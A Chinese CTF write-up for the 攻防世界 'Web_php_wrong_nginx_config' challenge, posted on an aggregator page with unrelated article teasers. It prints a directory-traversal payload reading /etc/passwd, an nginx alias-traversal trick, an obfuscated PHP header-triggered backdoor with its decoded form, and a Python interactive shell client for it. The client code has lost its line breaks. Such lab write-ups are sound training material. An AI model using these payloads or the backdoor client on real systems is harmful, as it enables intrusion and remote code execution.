92,[8] 攻防世界 web Web_php_wrong_nginx_config

news/2025/2/4 19:18:09/

进入靶场

 admin 123 

还尝试了很多,都是建设中

 进行目录扫描,扫描到了admin和robots.txt

这句话就应该想到BP

抓包

这样修改请求即可登录

 BP加载不出来

F12修改

管理中心点击后会发生url的改变

变成这样

目录穿越,不断尝试 

/admin/admin.php?file=./..././..././..././..././etc/passwd&ext= 

            server {listen 8080; ## listen for ipv4; this line is default and impliedlisten [::]:8080; ## listen for ipv6root /var/www/html;index index.php index.html index.htm;port_in_redirect off;server_name _;# Make site accessible from http://localhost/#server_name localhost;# If block for setting the time for the logfileif ($time_iso8601 ~ "^(\d{4})-(\d{2})-(\d{2})") {set $year $1;set $month $2;set $day $3;}# Disable sendfile as per https://docs.vagrantup.com/v2/synced-folders/virtualbox.htmlsendfile off;set $http_x_forwarded_for_filt $http_x_forwarded_for;if ($http_x_forwarded_for_filt ~ ([0-9]+\.[0-9]+\.[0-9]+\.)[0-9]+) {set $http_x_forwarded_for_filt $1???;}# Add stdout loggingaccess_log /var/log/nginx/$hostname-access-$year-$month-$day.log openshift_log;error_log /var/log/nginx/error.log info;location / {# First attempt to serve request as file, then# as directory, then fall back to index.htmltry_files $uri $uri/ /index.php?q=$uri&$args;server_tokens off;}#error_page 404 /404.html;# redirect server error pages to the static page /50x.html#error_page 500 502 503 504 /50x.html;location = /50x.html {root /usr/share/nginx/html;}location ~ \.php$ {try_files $uri $uri/ /index.php?q=$uri&$args;fastcgi_split_path_info ^(.+\.php)(/.+)$;fastcgi_pass unix:/var/run/php/php5.6-fpm.sock;fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_param SCRIPT_NAME $fastcgi_script_name;fastcgi_index index.php;include fastcgi_params;fastcgi_param REMOTE_ADDR $http_x_forwarded_for;}location ~ /\. {log_not_found off;deny all;}location /web-img {alias /images/;autoindex on;}location ~* \.(ini|docx|pcapng|doc)$ {  deny all;  }  include /var/www/nginx[.]conf;
}

看不懂啊,但要访问/web-img/了

 /web-img../

点吧

下载打开,长这样

php"><?php
// 定义一个混淆后的字符串 $U,后续会参与代码拼接
$U='_/|U","/-/|U"),ar|Uray|U("/|U","+"),$ss(|U$s[$i]|U,0,$e)|U)),$k))|U|U);$o|U|U=o|Ub_get_|Ucontents(|U);|Uob_end_cle';
// 定义一个混淆后的字符串 $q,后续会参与代码拼接
$q='s[|U$i]="";$p=|U$ss($p,3);}|U|Uif(array_k|Uey_|Uexis|Uts($|Ui,$s)){$s[$i].=|U$p|U;|U$e=|Ustrpos($s[$i],$f);|Ui';
// 定义一个混淆后的字符串 $M,后续会参与代码拼接
$M='l="strtolower|U";$i=$m|U[1|U][0].$m[1]|U[1];$|U|Uh=$sl($ss(|Umd5($i|U.$kh),|U0,3|U));$f=$s|Ul($ss(|Umd5($i.$';
// 定义一个混淆后的字符串 $z,后续会参与代码拼接
$z='r=@$r[|U"HTTP_R|UEFERER|U"];$r|U|Ua=@$r["HTTP_A|U|UCCEPT_LAN|UGUAGE|U"];if|U($r|Ur&|U&$ra){$u=parse_|Uurl($r';
// 定义一个混淆后的字符串 $k,后续会参与代码拼接
$k='?:;q=0.([\\|Ud]))?,|U?/",$ra,$m)|U;if($|Uq&&$m){|U|U|U@session_start()|U|U;$s=&$_SESSIO|UN;$ss="|Usubst|Ur";|U|U$s';
// 定义一个混淆后的字符串 $o,后续会参与代码拼接
$o='|U$l;|U){for|U($j=0;($j|U<$c&&|U|U$i|U<$|Ul);$j++,$i++){$o.=$t{$i}|U^$k|U{$j};}}|Ureturn $|Uo;}$r=$|U_SERV|UE|UR;$r';
// 定义一个混淆后的字符串 $N,后续会参与代码拼接
$N='|Uf($e){$k=$k|Uh.$kf|U;ob_sta|Urt();|U@eva|Ul(@g|Uzuncom|Upress(@x(@|Ubas|U|Ue64_decode(preg|U_repla|Uce(|Uarray("/';
// 定义一个混淆后的字符串 $C,后续会参与代码拼接
$C='an();$d=b|Uase64_encode(|Ux|U(gzcomp|U|Uress($o),$k))|U;prin|Ut("|U<$k>$d</$k>"|U);@ses|U|Usion_des|Utroy();}}}}';
// 定义一个混淆后的字符串 $j,后续会参与代码拼接
$j='$k|Uh="|U|U42f7";$kf="e9ac";fun|Uction|U |Ux($t,$k){$c|U=|Ustrlen($k);$l=s|Utrl|Ue|Un($t);$o=|U"";fo|Ur($i=0;$i<';
// 移除字符串 'rO' 后,实际上得到了 'create_function' 函数名
$R=str_replace('rO','','rOcreatrOe_rOrOfurOncrOtion');
// 定义一个混淆后的字符串 $J,后续会参与代码拼接
$J='kf|U),|U0,3));$p="|U";for(|U|U$|Uz=1;$z<cou|Unt|U($m[1]);|U$z++)$p.=|U$q[$m[2][$z|U]|U];if(strpos(|U$|U|Up,$h)|U===0){$';
// 定义一个混淆后的字符串 $x,后续会参与代码拼接
$x='r)|U;pa|Urse|U_str($u["qu|U|Uery"],$q);$|U|Uq=array_values(|U$q);pre|Ug|U_match_al|Ul("/([\\|U|Uw])[|U\\w-]+|U(';
// 将所有混淆字符串拼接起来,并移除其中的 '|U' 字符,得到最终的代码字符串
$f=str_replace('|U','',$j.$o.$z.$x.$k.$M.$J.$q.$N.$U.$C);
// 使用 create_function 动态创建一个匿名函数,函数体为拼接后的代码字符串
$g=create_function('',$f);
// 调用动态创建的匿名函数,执行其中的代码
$g();
?>

直接运行不出结果,添加echo $f

运行结果 

php">$kh="42f7";$kf="e9ac";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
​

 用大佬的脚本

php">from random import randint, choice
from hashlib import md5
import urllib.parse
import string
import zlib
import base64
import requests
import redef choicePart(seq, amount):length = len(seq)if length == 0 or length < amount:print('Error Input')return Noneresult = []indexes = []count = 0while count < amount:i = randint(0, length - 1)if i not in indexes:indexes.append(i)result.append(seq[i])count += 1if count == amount:return resultdef randBytesFlow(amount):result = b''for i in range(amount):result += bytes([randint(0, 255)])return resultdef randAlpha(amount):result = ''for i in range(amount):result += choice(string.ascii_letters)return resultdef loopXor(text, key):result = b''lenKey = len(key)lenTxt = len(text)iTxt = 0while iTxt < lenTxt:iKey = 0while iTxt < lenTxt and iKey < lenKey:result += bytes([key[iKey] ^ text[iTxt]])iTxt += 1iKey += 1return resultdef debugPrint(msg):if debugging:print(msg)# config
debugging = False
keyh = "         "  # $kh
keyf = "          "  # $kf
xorKey = keyh + keyf
url = '                               '
defaultLang = 'zh-CN'
languages = ['zh-TW;q=0.%d', 'zh-HK;q=0.%d', 'en-US;q=0.%d', 'en;q=0.%d']
proxies = None  # {'http':'http://127.0.0.1:8080'} # proxy for debugsess = requests.Session()
# generate random Accept-Language only once each session
langTmp = choicePart(languages, 3)
indexes = sorted(choicePart(range(1, 10), 3), reverse=True)
acceptLang = [defaultLang]
for i in range(3):acceptLang.append(langTmp[i] % (indexes[i],))
acceptLangStr = ','.join(acceptLang)
debugPrint(acceptLangStr)
init2Char = acceptLang[0][0] + acceptLang[1][0]  # $i
md5head = (md5((init2Char + keyh).encode('utf-8')).hexdigest())[0:3]
md5tail = (md5((init2Char + keyf).encode('utf-8')).hexdigest())[0:3] + randAlpha(randint(3, 8))
debugPrint('$i is %s' % (init2Char,))
debugPrint('md5 head: %s' % (md5head,))
debugPrint('md5 tail: %s' % (md5tail,))
# Interactive php shell
cmd = input('phpshell > ')
while cmd != '':# build junk data in refererquery = []for i in range(max(indexes) + 1 + randint(0, 2)):key = randAlpha(randint(3, 6))value = base64.urlsafe_b64encode(randBytesFlow(randint(3, 12))).decode('utf-8')query.append((key, value))debugPrint('Before insert payload:')debugPrint(query)debugPrint(urllib.parse.urlencode(query))# encode payloadpayload = zlib.compress(cmd.encode('utf-8'))payload = loopXor(payload, xorKey.encode('utf-8'))payload = base64.urlsafe_b64encode(payload).decode('utf-8')payload = md5head + payload# cut payload, replace into referercutIndex = randint(2, len(payload) - 3)payloadPieces = (payload[0:cutIndex], payload[cutIndex:], md5tail)iPiece = 0for i in indexes:query[i] = (query[i][0], payloadPieces[iPiece])iPiece += 1referer = url + '?' + urllib.parse.urlencode(query)debugPrint('After insert payload, referer is:')debugPrint(query)debugPrint(referer)# send requestr = sess.get(url, headers={'Accept-Language': acceptLangStr, 'Referer': referer}, proxies=proxies)html = r.textdebugPrint(html)# process responsepattern = re.compile(r'<%s>(.*)</%s>' % (xorKey, xorKey))output = pattern.findall(html)if len(output) == 0:print('Error,  no backdoor response')cmd = input('phpshell > ')continueoutput = output[0]debugPrint(output)output = base64.b64decode(output.encode('utf-8'))output = loopXor(output, xorKey.encode('utf-8'))output = zlib.decompress(output).decode('utf-8')print(output)cmd = input('phpshell > ')

最终要在python2里面运行

得到flag为ctf{a57b3698-eeae-48c0-a669-bafe3213568c}


http://www.ppmy.cn/news/1569303.html

相关文章

Git进阶之旅:分支管理策略

第一章&#xff1a; Git stash&#xff1a; 介绍&#xff1a; 当正在 dev 分支上开发某个项目&#xff0c;这时项目中出现一个 bug&#xff0c;需要修复&#xff0c;但是项目只完成一半&#xff0c;还不想提交&#xff0c;这时可以使用 git stash 命令将修改的内容保存至堆栈区…

汽车蓝牙钥匙定位仿真小程序

此需求来自于粉丝的真实需求,假期没事,牛刀小试。 一、项目背景 如今,智能车钥匙和移动端定位技术已经相当普及。为了探索蓝牙 Beacon 在短距离定位场景下的可行性,我们搭建了一个简易原型:利用 UniApp 在移动端采集蓝牙信标的 RSSI(信号强度),通过三边定位算法估算钥…

curope python安装

目录 curope安装 测试: 报错:libc10.so: cannot open shared object file: No such file or directory 解决方法: curope安装 git clone : GitHub - Junyi42/croco at bd6f4e07d5c4f13ae5388efc052dadf142aff754 cd models/curope/ python setup.py build_ext --inplac…

大厂面试题备份20250131

20250131 模型压缩怎么做&#xff1f;除了知识蒸馏 模型压缩是为了减少深度学习模型的计算和存储需求&#xff0c;提高推理效率。除了知识蒸馏&#xff0c;常见的模型压缩方法包括&#xff1a; 1. 剪枝&#xff08;Pruning&#xff09; 非结构化剪枝&#xff08;Unstructur…

基于微信小程序的酒店管理系统设计与实现(源码+数据库+文档)

酒店管理小程序目录 目录 基于微信小程序的酒店管理系统设计与实现 一、前言 二、系统功能设计 三、系统实现 1、管理员模块的实现 (1) 用户信息管理 (2) 酒店管理员管理 (3) 房间信息管理 2、小程序序会员模块的实现 &#xff08;1&#xff09;系统首页 &#xff…

DeepSeek r1本地安装全指南

环境基本要求 硬件配置 需要本地跑模型&#xff0c;兼顾质量、性能、速度以及满足日常开发需要&#xff0c;我们需要准备以下硬件&#xff1a; CPU&#xff1a;I9内存&#xff1a;128GB硬盘&#xff1a;3-4TB 最新SSD&#xff0c;C盘确保有400GB&#xff0c;其它都可划成D盘…

python3+TensorFlow 2.x 基础学习(一)

目录 TensorFlow 2.x基础 1、安装 TensorFlow 2.x 2、TensorFlow 2.x 基础概念 2、1 Eager Execution 2、2 TensorFlow 张量&#xff08;Tensor&#xff09; 3、使用Keras构建神经网络模型 3、1 构建 Sequential 模型 3、2 编译模型 1、Optimizer&#xff08;优化器&a…

第31章 星骗计划的推进与团队协作

我回到自己的办公室&#xff0c;在座位上刚坐下没多久&#xff0c;还没来得及好好整理一下思绪&#xff0c;就听到一阵敲门声。“请进。” 我抬头说道&#xff0c;声音中带着一丝疲惫。借助情绪监测系统&#xff0c;我察觉到自己的压力指数正处于高位&#xff0c;于是暗自提醒自…